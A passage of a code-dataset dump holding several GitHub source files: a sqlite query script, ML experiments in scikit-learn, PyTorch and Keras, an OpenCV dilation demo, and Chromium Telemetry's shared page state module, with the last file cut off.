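canvas.bind("<Button-1>", on_click)
root.mainloop()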
+{"seq_id":"35620397857","text":"#!/usr/bin/env python3\r\n\r\nimport sqlite3\r\n\r\nconn = sqlite3.connect(\"university.db\")\r\n\r\nSTMT_INST_ID_FOR_NAME = \"\"\"\r\n select name\r\n from instructor\r\n where ID =:id\r\n \"\"\"\r\n\r\nSTMT_INST_BUILDING_FOR_NAME = \"\"\"\r\n select building\r\n from instructor, department\r\n where instructor.dept_name = department.dept_name and name = :name\r\n \"\"\"\r\n\r\nSTMT_INST_NAME_BUILDING = \"\"\"\r\n select name, building\r\n from instructor natural join department\r\n \"\"\"\r\n\r\n\r\ndef get_instructor_name(id):\r\n c = conn.execute(STMT_INST_ID_FOR_NAME, {'id': id})\r\n return c.fetchone()\r\n\r\n\r\ndef get_instructor_building(name):\r\n c = conn.execute(STMT_INST_BUILDING_FOR_NAME, {'name': name})\r\n return c.fetchall()\r\n\r\n\r\ndef get_instructor_building_list():\r\n c = conn.execute(STMT_INST_NAME_BUILDING)\r\n return c.fetchall()\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n print(get_instructor_name('22222'))\r\n\r\n print(get_instructor_building('Einstein'))\r\n\r\n print(get_instructor_building_list())\r\n\r\n","repo_name":"kim2-d2/CAS-ADS","sub_path":"M1/Material/access-sql (1).py","file_name":"access-sql (1).py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"33214800800","text":"from sklearn.ensemble import BaggingRegressor\nfrom function_library import *\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom sklearn.tree import DecisionTreeRegressor\nnp.random.seed(272) #L dies after 272 days. RIP L\n\n\nnumber_crossvals=5 #The number of cross validations to perform. 5 to get \"actual\" results, 1 for a simple train-test split\n\n\nfiledata=\"../data/qm7.mat\"\n\nX,R,Z,T,P=read_data(filedata)\ntree_depth=20 #The depth of the tree to perform bagging with\nn_estimators=np.logspace(0,3,7,dtype=int) #The number of trees\n\ntest_err_MSE=np.zeros(len(n_estimators),dtype=\"float\")\ntrain_err_MSE=np.zeros(len(n_estimators),dtype=\"float\")\n\nplt.title(\"Decision Tree Bagging Regressor\")\nplt.xlabel(\"Number of Bootstraps\")\nplt.ylabel(\"MAE (kcal/mol)\")\nplt.xscale(\"log\")\ninput_type=\"reduced\" #noH or reduced\n\nfor index in range(number_crossvals):\n print(\"Forest %d\"%index)\n X_train, R_train, Z_train, T_train, X_test, R_test, Z_test, T_test= convert_dataset(X,R,Z,T,P,index)\n T_train=T_train.ravel()\n T_test=T_test.ravel()\n if input_type==\"reduced\": #Reduced Coulomb matrix\n pass\n if input_type==\"noH\": #No Hydrogen\n testing_indeces=P[index]\n training_indeces=np.delete(P,index,0).ravel()\n X_removed=create_hydrogenfree_coulomb_matrix(X)\n X_removed=reduce_coulomb(X_removed)\n X_train, X_test= createTestTrain(X_removed,training_indeces,testing_indeces)\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train_scaled=scaler.transform(X_train)\n X_test_scaled=scaler.transform(X_test)\n for i,number_estimators in enumerate(n_estimators):\n \"\"\"Make a Bagging Regressor with given number of estimators and tree depths \"\"\"\n regressor=BaggingRegressor(DecisionTreeRegressor(max_depth=tree_depth),n_estimators=number_estimators)\n regressor.fit(X_train_scaled,T_train)\n train_pred=regressor.predict(X_train_scaled)\n test_pred=regressor.predict(X_test_scaled)\n test_err_MSE[i]+=MAE(test_pred,T_test)\n\n train_err_MSE[i]+=MAE(T_train,train_pred)\ntrain_err_MSE/=number_crossvals;\ntest_err_MSE/=number_crossvals;\nplt.plot(n_estimators,test_err_MSE, label=\"test error\")\nplt.plot(n_estimators,train_err_MSE, label=\"train error\")\n\nplt.legend()\nplt.savefig(\"../figures/bagging_2%s.pdf\"%input_type)\nprint(\"MSE: Minimum error at %d estimators with test error %f\"%(n_estimators[np.argmin(test_err_MSE)],np.min(test_err_MSE)));\n\nplt.show()\n\"\"\"\nrun as\npython3 bagging.py\n\"\"\"\n","repo_name":"schraderSimon/FYS-STK","sub_path":"project3/code/bagging.py","file_name":"bagging.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"15073637231","text":"#Criamos manualmente elementos de estruturação nos exemplos anteriores com a ajuda do Numpy. É uma forma retangular. Mas, em alguns casos, você pode precisar de grãos de formato elíptico / circular. Portanto, para este propósito, OpenCV possui uma função, cv2.getStructuringElement () . Basta passar a forma e o tamanho do kernel, você obtém o kernel desejado.\nimport cv2\n\nimage = cv2.imread('image.jpg')\n\ngrayscale_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\ncv2.imshow('Input grayscale image', grayscale_image)\n\nret, threshold_image = cv2.threshold(grayscale_image, 0, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n\ncv2.imshow('Threshold image', threshold_image)\n\n# cria um Elemento Estruturante\nkernel = cv2.getStructuringElement(cv2.MORPH_RECT, (1, 3)) #o MORPH_RECT é para ir deixando a imagem branca retangular.\n #o MORPH_ELLIPSE é em forma eliptica.\n #o MORPH_CROSS é em formato de cruz.\n #o (1, 3) regula se mais para vertical ou lateral\n\n# Apply the dilation\nfor i in range(9):\n dilation = cv2.dilate(threshold_image, kernel, iterations=i)\n\n # Show the result of the dilation\n cv2.imshow('Dilated image', dilation)\n cv2.waitKey(1000)\n","repo_name":"andersontbessa/Lapisco-training-in-Python-OpenCV---answers","sub_path":"37/37.py","file_name":"37.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"5856448950","text":"import logging\nimport os\nimport shutil\nimport sys\nimport zipfile\n\nfrom catapult_base import cloud_storage\nfrom telemetry.core import exceptions\nfrom telemetry.core import util\nfrom telemetry import decorators\nfrom telemetry.internal.browser import browser_finder\nfrom telemetry.internal.browser import browser_finder_exceptions\nfrom telemetry.internal.browser import browser_info as browser_info_module\nfrom telemetry.internal.platform.profiler import profiler_finder\nfrom telemetry.internal.util import exception_formatter\nfrom telemetry.internal.util import file_handle\nfrom telemetry.page import action_runner as action_runner_module\nfrom telemetry.page import page_test\nfrom telemetry import story\nfrom telemetry.util import wpr_modes\nfrom telemetry.web_perf import timeline_based_measurement\n\n\ndef _PrepareFinderOptions(finder_options, test, device_type):\n browser_options = finder_options.browser_options\n # Set up user agent.\n browser_options.browser_user_agent_type = device_type\n\n test.CustomizeBrowserOptions(finder_options.browser_options)\n if finder_options.profiler:\n profiler_class = profiler_finder.FindProfiler(finder_options.profiler)\n profiler_class.CustomizeBrowserOptions(browser_options.browser_type,\n finder_options)\n\nclass SharedPageState(story.SharedState):\n \"\"\"\n This class contains all specific logic necessary to run a Chrome browser\n benchmark.\n \"\"\"\n\n _device_type = None\n\n def __init__(self, test, finder_options, story_set):\n super(SharedPageState, self).__init__(test, finder_options, story_set)\n if isinstance(test, timeline_based_measurement.TimelineBasedMeasurement):\n # This is to avoid the cyclic-import caused by timeline_based_page_test.\n from telemetry.web_perf import timeline_based_page_test\n self._test = timeline_based_page_test.TimelineBasedPageTest(test)\n else:\n self._test = test\n device_type = self._device_type\n # TODO(aiolos, nednguyen): Remove this logic of pulling out user_agent_type\n # from story_set once all page_set are converted to story_set\n # (crbug.com/439512).\n def _IsPageSetInstance(s):\n # This is needed to avoid importing telemetry.page.page_set which will\n # cause cyclic import.\n return 'PageSet' == s.__class__.__name__ or 'PageSet' in (\n list(c.__name__ for c in s.__class__.__bases__))\n if not device_type and _IsPageSetInstance(story_set):\n device_type = story_set.user_agent_type\n _PrepareFinderOptions(finder_options, self._test, device_type)\n self._browser = None\n self._finder_options = finder_options\n self._possible_browser = self._GetPossibleBrowser(\n self._test, finder_options)\n\n # TODO(slamm): Remove _append_to_existing_wpr when replay lifetime changes.\n self._append_to_existing_wpr = False\n self._first_browser = True\n self._did_login_for_current_page = False\n self._current_page = None\n self._current_tab = None\n\n self._pregenerated_profile_archive = None\n self._test.SetOptions(self._finder_options)\n\n @property\n def browser(self):\n return self._browser\n\n def _GetPossibleBrowser(self, test, finder_options):\n \"\"\"Return a possible_browser with the given options. 
\"\"\"\n possible_browser = browser_finder.FindBrowser(finder_options)\n if not possible_browser:\n raise browser_finder_exceptions.BrowserFinderException(\n 'No browser found.\\n\\nAvailable browsers:\\n%s\\n' %\n '\\n'.join(browser_finder.GetAllAvailableBrowserTypes(finder_options)))\n finder_options.browser_options.browser_type = (\n possible_browser.browser_type)\n\n (enabled, msg) = decorators.IsEnabled(test, possible_browser)\n if (not enabled and\n not finder_options.run_disabled_tests):\n logging.warning(msg)\n logging.warning('You are trying to run a disabled test.')\n logging.warning('Pass --also-run-disabled-tests to squelch this message.')\n sys.exit(0)\n\n if possible_browser.IsRemote():\n possible_browser.RunRemote()\n sys.exit(0)\n return possible_browser\n\n def DidRunStory(self, results):\n if self._finder_options.profiler:\n self._StopProfiling(results)\n # We might hang while trying to close the connection, and need to guarantee\n # the page will get cleaned up to avoid future tests failing in weird ways.\n try:\n if self._current_tab and self._current_tab.IsAlive():\n self._test.CleanUpAfterPage(self._current_page, self._current_tab)\n self._current_tab.CloseConnections()\n finally:\n if self._current_page.credentials and self._did_login_for_current_page:\n self.browser.credentials.LoginNoLongerNeeded(\n self._current_tab, self._current_page.credentials)\n if self._test.StopBrowserAfterPage(self.browser, self._current_page):\n self._StopBrowser()\n self._current_page = None\n self._current_tab = None\n\n @property\n def platform(self):\n return self._possible_browser.platform\n\n def _PrepareWpr(self, network_controller, archive_path,\n make_javascript_deterministic):\n browser_options = self._finder_options.browser_options\n if self._finder_options.use_live_sites:\n browser_options.wpr_mode = wpr_modes.WPR_OFF\n elif browser_options.wpr_mode != wpr_modes.WPR_RECORD:\n browser_options.wpr_mode = (\n wpr_modes.WPR_REPLAY\n if archive_path and os.path.isfile(archive_path)\n else wpr_modes.WPR_OFF)\n\n # Replay's life-cycle is tied to the browser. 
Start and Stop are handled by\n # platform_backend.DidCreateBrowser and platform_backend.WillCloseBrowser,\n # respectively.\n # TODO(slamm): Update life-cycle comment with https://crbug.com/424777 fix.\n wpr_mode = browser_options.wpr_mode\n if self._append_to_existing_wpr and wpr_mode == wpr_modes.WPR_RECORD:\n wpr_mode = wpr_modes.WPR_APPEND\n network_controller.SetReplayArgs(\n archive_path, wpr_mode, browser_options.netsim,\n browser_options.extra_wpr_args, make_javascript_deterministic)\n\n def _StartBrowser(self, page):\n assert self._browser is None\n self._possible_browser.SetCredentialsPath(page.credentials_path)\n\n self._test.WillStartBrowser(self.platform)\n self._browser = self._possible_browser.Create(self._finder_options)\n self._test.DidStartBrowser(self.browser)\n\n if self._first_browser:\n self._first_browser = False\n self.browser.credentials.WarnIfMissingCredentials(page)\n logging.info('OS: %s %s',\n self.platform.GetOSName(),\n self.platform.GetOSVersionName())\n if self.browser.supports_system_info:\n system_info = self.browser.GetSystemInfo()\n if system_info.model_name:\n logging.info('Model: %s', system_info.model_name)\n if system_info.gpu:\n for i, device in enumerate(system_info.gpu.devices):\n logging.info('GPU device %d: %s', i, device)\n if system_info.gpu.aux_attributes:\n logging.info('GPU Attributes:')\n for k, v in sorted(system_info.gpu.aux_attributes.iteritems()):\n logging.info(' %-20s: %s', k, v)\n if system_info.gpu.feature_status:\n logging.info('Feature Status:')\n for k, v in sorted(system_info.gpu.feature_status.iteritems()):\n logging.info(' %-20s: %s', k, v)\n if system_info.gpu.driver_bug_workarounds:\n logging.info('Driver Bug Workarounds:')\n for workaround in system_info.gpu.driver_bug_workarounds:\n logging.info(' %s', workaround)\n else:\n logging.info('No GPU devices')\n else:\n logging.warning('System info not supported')\n\n\n def WillRunStory(self, page):\n if self._ShouldDownloadPregeneratedProfileArchive():\n self._DownloadPregeneratedProfileArchive()\n\n page_set = page.page_set\n self._current_page = page\n if self._test.RestartBrowserBeforeEachPage() or page.startup_url:\n self._StopBrowser()\n started_browser = not self.browser\n self._PrepareWpr(self.platform.network_controller,\n page_set.WprFilePathForStory(page),\n page.make_javascript_deterministic)\n if self.browser:\n # Set new credential path for browser.\n self.browser.credentials.credentials_path = page.credentials_path\n self.platform.network_controller.UpdateReplayForExistingBrowser()\n else:\n self._StartBrowser(page)\n if self.browser.supports_tab_control and self._test.close_tabs_before_run:\n # Create a tab if there's none.\n if len(self.browser.tabs) == 0:\n self.browser.tabs.New()\n\n # Ensure only one tab is open, unless the test is a multi-tab test.\n if not self._test.is_multi_tab_test:\n while len(self.browser.tabs) > 1:\n self.browser.tabs[-1].Close()\n\n # Must wait for tab to commit otherwise it can commit after the next\n # navigation has begun and RenderFrameHostManager::DidNavigateMainFrame()\n # will cancel the next navigation because it's pending. This manifests as\n # the first navigation in a PageSet freezing indefinitely because the\n # navigation was silently cancelled when |self.browser.tabs[0]| was\n # committed. 
Only do this when we just started the browser, otherwise\n # there are cases where previous pages in a PageSet never complete\n # loading so we'll wait forever.\n if started_browser:\n self.browser.tabs[0].WaitForDocumentReadyStateToBeComplete()\n\n # Start profiling if needed.\n if self._finder_options.profiler:\n self._StartProfiling(self._current_page)\n\n def CanRunStory(self, page):\n return self.CanRunOnBrowser(browser_info_module.BrowserInfo(self.browser),\n page)\n\n def CanRunOnBrowser(self, browser_info,\n page): # pylint: disable=unused-argument\n \"\"\"Override this to return whether the browser brought up by this state\n instance is suitable for running the given page.\n\n Args:\n browser_info: an instance of telemetry.core.browser_info.BrowserInfo\n page: an instance of telemetry.page.Page\n \"\"\"\n return True\n\n def _PreparePage(self):\n self._current_tab = self._test.TabForPage(self._current_page, self.browser)\n if self._current_page.is_file:\n self.browser.SetHTTPServerDirectories(\n self._current_page.page_set.serving_dirs |\n set([self._current_page.serving_dir]))\n\n if self._current_page.credentials:\n if not self.browser.credentials.LoginNeeded(\n self._current_tab, self._current_page.credentials):\n raise page_test.Failure(\n 'Login as ' + self._current_page.credentials + ' failed')\n self._did_login_for_current_page = True\n\n if self._test.clear_cache_before_each_run:\n self._current_tab.ClearCache(force=True)\n\n def _ImplicitPageNavigation(self):\n \"\"\"Executes the implicit navigation that occurs for every page iteration.\n\n This function will be called once per page before any actions are executed.\n \"\"\"\n self._test.WillNavigateToPage(self._current_page, self._current_tab)\n self._test.RunNavigateSteps(self._current_page, self._current_tab)\n self._test.DidNavigateToPage(self._current_page, self._current_tab)\n\n def RunStory(self, results):\n try:\n self._PreparePage()\n self._ImplicitPageNavigation()\n action_runner = action_runner_module.ActionRunner(\n self._current_tab, skip_waits=self._current_page.skip_waits)\n self._current_page.RunPageInteractions(action_runner)\n self._test.ValidateAndMeasurePage(\n self._current_page, self._current_tab, results)\n except exceptions.Error:\n if self._test.is_multi_tab_test:\n # Avoid trying to recover from an unknown multi-tab state.\n exception_formatter.PrintFormattedException(\n msg='Telemetry Error during multi tab test:')\n raise page_test.MultiTabTestAppCrashError\n raise\n\n def TearDownState(self):\n self._StopBrowser()\n\n def _StopBrowser(self):\n if self._browser:\n self._browser.Close()\n self._browser = None\n\n # Restarting the state will also restart the wpr server. 
If we're\n # recording, we need to continue adding into the same wpr archive,\n # not overwrite it.\n self._append_to_existing_wpr = True\n\n def _StartProfiling(self, page):\n output_file = os.path.join(self._finder_options.output_dir,\n page.file_safe_name)\n is_repeating = (self._finder_options.page_repeat != 1 or\n self._finder_options.pageset_repeat != 1)\n if is_repeating:\n output_file = util.GetSequentialFileName(output_file)\n self.browser.profiling_controller.Start(\n self._finder_options.profiler, output_file)\n\n def _StopProfiling(self, results):\n if self.browser:\n profiler_files = self.browser.profiling_controller.Stop()\n for f in profiler_files:\n if os.path.isfile(f):\n results.AddProfilingFile(self._current_page,\n file_handle.FromFilePath(f))\n\n def GetPregeneratedProfileArchive(self):\n return self._pregenerated_profile_archive\n\n def SetPregeneratedProfileArchive(self, archive):\n \"\"\"\n Benchmarks can set a pre-generated profile archive to indicate that when\n Chrome is launched, it should have a --user-data-dir set to the\n pregenerated profile, rather than to an empty profile.\n\n If the benchmark is invoked with the option --profile-dir=, that\n option overrides this value.\n \"\"\"\n self._pregenerated_profile_archive = archive\n\n def _ShouldDownloadPregeneratedProfileArchive(self):\n \"\"\"Whether to download a pre-generated profile archive.\"\"\"\n # There is no pre-generated profile archive.\n if not self.GetPregeneratedProfileArchive():\n return False\n\n # If profile dir is specified on command line, use that instead.\n if self._finder_options.browser_options.profile_dir:\n logging.warning(\"Profile directory specified on command line: %s, this\"\n \"overrides the benchmark's default profile directory.\",\n self._finder_options.browser_options.profile_dir)\n return False\n\n # If the browser is remote, a local download has no effect.\n if self._possible_browser.IsRemote():\n return False\n\n return True\n\n def _DownloadPregeneratedProfileArchive(self):\n \"\"\"Download and extract the profile directory archive if one exists.\n\n On success, updates self._finder_options.browser_options.profile_dir with\n the directory of the extracted profile.\n \"\"\"\n # Download profile directory from cloud storage.\n test_data_dir = os.path.join(util.GetChromiumSrcDir(), 'tools', 'perf',\n 'generated_profiles',\n self._possible_browser.target_os)\n archive_name = self.GetPregeneratedProfileArchive()\n generated_profile_archive_path = os.path.normpath(\n os.path.join(test_data_dir, archive_name))\n\n try:\n cloud_storage.GetIfChanged(generated_profile_archive_path,\n cloud_storage.PUBLIC_BUCKET)\n except (cloud_storage.CredentialsError,\n cloud_storage.PermissionError) as e:\n if os.path.exists(generated_profile_archive_path):\n # If the profile directory archive exists, assume the user has their\n # own local copy simply warn.\n logging.warning('Could not download Profile archive: %s',\n generated_profile_archive_path)\n else:\n # If the archive profile directory doesn't exist, this is fatal.\n logging.error('Can not run without required profile archive: %s. 
'\n 'If you believe you have credentials, follow the '\n 'instructions below.',\n generated_profile_archive_path)\n logging.error(str(e))\n sys.exit(-1)\n\n # Check to make sure the zip file exists.\n if not os.path.isfile(generated_profile_archive_path):\n raise Exception(\"Profile directory archive not downloaded: \",\n generated_profile_archive_path)\n\n # The location to extract the profile into.\n extracted_profile_dir_path = (\n os.path.splitext(generated_profile_archive_path)[0])\n\n # Unzip profile directory.\n with zipfile.ZipFile(generated_profile_archive_path) as f:\n try:\n f.extractall(os.path.dirname(generated_profile_archive_path))\n except e:\n # Cleanup any leftovers from unzipping.\n if os.path.exists(extracted_profile_dir_path):\n shutil.rmtree(extracted_profile_dir_path)\n logging.error(\"Error extracting profile directory zip file: %s\", e)\n sys.exit(-1)\n\n # Run with freshly extracted profile directory.\n logging.info(\"Using profile archive directory: %s\",\n extracted_profile_dir_path)\n self._finder_options.browser_options.profile_dir = (\n extracted_profile_dir_path)\n\nclass SharedMobilePageState(SharedPageState):\n _device_type = 'mobile'\n\n\nclass SharedDesktopPageState(SharedPageState):\n _device_type = 'desktop'\n\n\nclass SharedTabletPageState(SharedPageState):\n _device_type = 'tablet'\n\n\nclass Shared10InchTabletPageState(SharedPageState):\n _device_type = 'tablet_10_inch'\n","repo_name":"googlearchive/big-rig","sub_path":"app/src/thirdparty/telemetry/page/shared_page_state.py","file_name":"shared_page_state.py","file_ext":"py","file_size_in_byte":17204,"program_lang":"python","lang":"en","doc_type":"code","stars":857,"dataset":"github-code","pt":"61"}
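The shared_page_state record above extracts a downloaded profile archive with zipfile and removes any partially extracted files if the extraction fails. A small sketch of that extract-with-cleanup pattern, wrapped in a hypothetical helper so the path stays a placeholder:

import logging
import os
import shutil
import zipfile

def extract_profile_archive(archive_path):
    """Extract the archive next to itself, removing partial output on failure."""
    extracted_dir = os.path.splitext(archive_path)[0]
    with zipfile.ZipFile(archive_path) as zf:
        try:
            zf.extractall(os.path.dirname(archive_path))
        except Exception as exc:
            # remove any partially extracted files before giving up
            if os.path.exists(extracted_dir):
                shutil.rmtree(extracted_dir)
            logging.error("Error extracting profile archive: %s", exc)
            raise
    return extracted_dir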
+{"seq_id":"4759346025","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport random\nimport copy\n\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nfrom models.transformer.attention import MultiHeadAttention\n\n\nclass LangModule(nn.Module):\n def __init__(self, num_text_classes, use_lang_classifier=True, use_bidir=False,\n emb_size=300, hidden_size=256):\n super().__init__()\n\n self.num_text_classes = num_text_classes\n self.use_lang_classifier = use_lang_classifier\n self.use_bidir = use_bidir\n\n self.gru = nn.GRU(\n input_size=emb_size,\n hidden_size=hidden_size,\n batch_first=True,\n bidirectional=self.use_bidir\n )\n lang_size = hidden_size * 2 if self.use_bidir else hidden_size\n\n # language classifier\n if use_lang_classifier:\n self.lang_cls = nn.Sequential(\n nn.Linear(lang_size, num_text_classes),\n nn.Dropout()\n )\n\n self.fc = nn.Linear(256, 128)\n self.dropout = nn.Dropout(p=.1)\n self.layer_norm = nn.LayerNorm(128)\n # self.mhatt = MultiHeadAttention(d_model=128, d_k=16, d_v=16, h=4, dropout=.1, identity_map_reordering=False,\n # attention_module=None,\n # attention_module_kwargs=None)\n\n def forward(self, data_dict):\n \"\"\"\n encode the input descriptions\n \"\"\"\n\n word_embs = data_dict[\"ground_lang_feat_list\"] # B * 32 * MAX_DES_LEN * LEN(300)\n lang_len = data_dict[\"ground_lang_len_list\"]\n #word_embs = data_dict[\"lang_feat_list\"] # B * 32 * MAX_DES_LEN * LEN(300)\n #lang_len = data_dict[\"lang_len_list\"]\n #word_embs = data_dict[\"main_lang_feat_list\"] # B * 32 * MAX_DES_LEN * LEN(300)\n #lang_len = data_dict[\"main_lang_len_list\"]\n batch_size, len_nun_max, max_des_len = word_embs.shape[:3]\n\n word_embs = word_embs.reshape(batch_size * len_nun_max, max_des_len, -1)\n lang_len = lang_len.reshape(batch_size * len_nun_max)\n first_obj = data_dict[\"ground_first_obj_list\"].reshape(batch_size * len_nun_max)\n #first_obj = data_dict[\"first_obj_list\"].reshape(batch_size * len_nun_max)\n\n # masking\n if data_dict[\"istrain\"][0] == 1 and random.random() < 0.5:\n for i in range(word_embs.shape[0]):\n word_embs[i, first_obj] = data_dict[\"unk\"][0]\n len = lang_len[i]\n for j in range(int(len/5)):\n num = random.randint(0, len-1)\n word_embs[i, num] = data_dict[\"unk\"][0]\n elif data_dict[\"istrain\"][0] == 1:\n for i in range(word_embs.shape[0]):\n len = lang_len[i]\n for j in range(int(len/5)):\n num = random.randint(0, len-1)\n word_embs[i, num] = data_dict[\"unk\"][0]\n\n # Reverse; Useless; You Could Remove It\n if max_des_len > 100:\n main_lang_len = data_dict[\"ground_main_lang_len_list\"]\n #main_lang_len = data_dict[\"main_lang_len_list\"]\n main_lang_len = main_lang_len.reshape(batch_size * len_nun_max)\n\n if data_dict[\"istrain\"][0] == 1 and random.random() < 0.5:\n for i in range(word_embs.shape[0]):\n new_word_emb = copy.deepcopy(word_embs[i])\n new_len = lang_len[i] - main_lang_len[i]\n new_word_emb[:new_len] = word_embs[i, main_lang_len[i]:lang_len[i]]\n new_word_emb[new_len:lang_len[i]] = word_embs[i, :main_lang_len[i]]\n word_embs[i] = new_word_emb\n\n # lang_feat = pack_padded_sequence(word_embs, lang_len, batch_first=True, enforce_sorted=False)\n lang_feat = pack_padded_sequence(word_embs, lang_len.cpu(), batch_first=True, enforce_sorted=False)\n\n out, lang_last = self.gru(lang_feat)\n\n padded = pad_packed_sequence(out, batch_first=True)\n cap_emb, cap_len = padded\n if self.use_bidir:\n cap_emb = (cap_emb[:, :, :int(cap_emb.shape[2] / 2)] + cap_emb[:, :, int(cap_emb.shape[2] 
/ 2):]) / 2\n\n b_s, seq_len = cap_emb.shape[:2]\n mask_queries = torch.ones((b_s, seq_len), dtype=torch.int)\n for i in range(b_s):\n mask_queries[i, cap_len[i]:] = 0\n attention_mask = (mask_queries == 0).unsqueeze(1).unsqueeze(1).cuda() # (b_s, 1, 1, seq_len)\n data_dict[\"attention_mask\"] = attention_mask\n\n lang_fea = F.relu(self.fc(cap_emb)) # batch_size, n, hidden_size\n lang_fea = self.dropout(lang_fea)\n lang_fea = self.layer_norm(lang_fea)\n # lang_fea = self.mhatt(lang_fea, lang_fea, lang_fea, attention_mask)\n\n data_dict[\"lang_fea\"] = lang_fea\n\n # data_dict[\"lang_fea\"] = cap_emb\n # print(\"lang_fea\", lang_fea.shape)\n\n lang_last = lang_last.permute(1, 0, 2).contiguous().flatten(start_dim=1) # batch_size, hidden_size * num_dir\n # store the encoded language features\n data_dict[\"lang_emb\"] = lang_last # B, hidden_size\n # print(\"lang_last\", lang_last.shape)\n\n # classify\n if self.use_lang_classifier:\n data_dict[\"lang_scores\"] = self.lang_cls(data_dict[\"lang_emb\"])\n\n return data_dict\n\n","repo_name":"zlccccc/3DVL_Codebase","sub_path":"models/base_module/lang_module.py","file_name":"lang_module.py","file_ext":"py","file_size_in_byte":5341,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"61"}
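The lang_module record above encodes variable-length word embeddings with a GRU via pack_padded_sequence and pad_packed_sequence. A stripped-down sketch of just that packing step, with made-up tensor sizes:

import torch
import torch.nn as nn
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence

batch, max_len, emb = 4, 10, 300
word_embs = torch.randn(batch, max_len, emb)
lengths = torch.tensor([10, 7, 5, 2])

gru = nn.GRU(input_size=emb, hidden_size=256, batch_first=True)
packed = pack_padded_sequence(word_embs, lengths.cpu(), batch_first=True,
                              enforce_sorted=False)
out, last = gru(packed)
padded, out_lens = pad_packed_sequence(out, batch_first=True)
print(padded.shape, out_lens)   # (4, 10, 256), tensor([10, 7, 5, 2])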
+{"seq_id":"73287735235","text":"from tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Embedding, Flatten, Dense, Dropout, Conv1D, MaxPooling1D\nfrom tensorflow.keras.datasets import imdb\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras import losses, activations, regularizers, optimizers, metrics\nimport numpy as np\n\nverbosity_mode = True\nvalidation_split = 0.20\n\n\ndef padding(num_words, secuencia):\n (x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=num_words)\n print(x_train.shape)\n print(x_test.shape)\n\n # Padding\n padded_inputs = pad_sequences(x_train, maxlen=secuencia, value = 0) #Padding con 0 como si fuera una \n padded_inputs_test = pad_sequences(x_test , maxlen=secuencia, value = 0) #palabra desconocida \n\n return (padded_inputs, y_train), (padded_inputs_test, y_test) \n\ndef ejer4():\n secuencia = 400 # Voy a suponer que no existen reviews más largas que esto\n num_words = 10000 \n embedding_output = 50 #Downsizing \n \n (x_train, y_train), (x_test, y_test) = padding(num_words, secuencia)\n print(x_train.shape)\n \n model = Sequential()\n \n model.add(Embedding(num_words, embedding_output, input_length=secuencia))\n model.add(Dropout(0.50))\n \n model.add(Conv1D(filters=16, \n kernel_size=4, \n padding='same', \n activation='relu'))\n model.add(MaxPooling1D(pool_size=2))\n \n model.add(Dropout(0.50))\n \n # model.add(Conv1D(filters=16, \n # kernel_size=4, \n # padding='same', \n # activation='relu'))\n \n # model.add(MaxPooling1D(pool_size=2))\n \n #model.add(Dropout(0.50))\n \n model.add(Flatten())\n\n model.add(Dense(30, activation='relu', \n activity_regularizer=regularizers.l2(0.01)))\n\n model.add(Dense(1, activation='sigmoid', \n activity_regularizer=regularizers.l2(0.01)))\n\n model.compile( optimizer=optimizers.SGD(0.002),\n loss=losses.BinaryCrossentropy(), \n metrics=[metrics.binary_accuracy])\n\n model.summary()\n n_epochs = 300\n history = model.fit(x_train, y_train, \n epochs=n_epochs,\n batch_size=50, \n validation_data=(x_test,y_test))\n \n \n acc, val_acc, loss, val_loss = plot_ejercicio(history) \n \n np.savetxt(\"ejer4.txt\", np.array([ \n acc, val_acc, loss, val_loss\n ]).T)\n \n# plt.figure(1)\n# plt.ylabel(\"Precisión [%]\")\n# plt.plot(acc , label=\"Entrenamiento\", c='red', alpha=0.6, ls='--')\n# plt.plot(val_acc, label=\"Validación\", c='blue', alpha=0.6)\n# plt.legend(loc=0)\n# plt.savefig(\"../docs/Figs/ejer4_acc.pdf\")\n \n# plt.figure(2)\n# plt.ylabel(\"Pérdida\")\n# plt.plot(loss , label=\"Entrenamiento\", c='red', alpha=0.6, ls='--')\n# plt.plot(val_loss, label=\"Validación\", c='blue', alpha=0.6)\n# plt.legend(loc=0)\n# plt.savefig(\"../docs/Figs/ejer4_loss.pdf\")\n\n# plt.show()\n \ndef plot_ejercicio(history): \n \n acc_train = 100*np.array(history.history['binary_accuracy'])\n acc_test = 100*np.array(history.history['val_binary_accuracy'])\n\n loss = np.array(history.history['loss'])\n val_loss = np.array(history.history['val_loss']) \n \n return acc_train, acc_test, loss, val_loss\n\nimport matplotlib.pyplot as plt\n\nimport matplotlib as mpl\nmpl.rcParams.update({\n\t'font.size': 20,\n\t'figure.figsize': [12, 8],\n\t'figure.autolayout': True,\n\t'font.family': 'serif',\n\t'font.sans-serif': ['Palatino']})\n\ndef plot_output():\n loss , acc , val_loss, val_acc = np.loadtxt(\"ejer4_saved.txt\", unpack=True)\n acc3, val_acc3, loss3, val_loss3 = np.loadtxt(\"ejer3_optimo.txt\", unpack=True) \n \n acc = 100*acc\n val_acc = 100*val_acc\n \n plt.figure(1)\n 
